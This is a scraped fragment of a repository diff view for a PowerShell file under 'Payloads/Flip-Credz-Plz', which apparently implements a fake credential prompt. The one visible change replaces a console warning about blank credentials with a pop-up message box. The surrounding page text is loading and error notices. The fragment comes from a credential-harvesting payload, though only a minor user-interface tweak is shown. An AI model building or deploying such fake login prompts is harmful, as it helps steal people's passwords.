🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■
    Payloads/Flip-Credz-Plz/test.ps1
    skipped 57 lines
    58 58   
    59 59   if([string]::IsNullOrWhiteSpace([Net.NetworkCredential]::new('', $cred.Password).Password))
    60 60   {
    61  - Write-Output "Credentials cannot be left blank. Please try again."
     61 + [System.Windows.Forms.MessageBox]::Show("Credentials can not be empty!")
    62 62   $form = $null
    63 63   }
    64 64  
    skipped 156 lines
Please wait...
Page is in error, reload to recover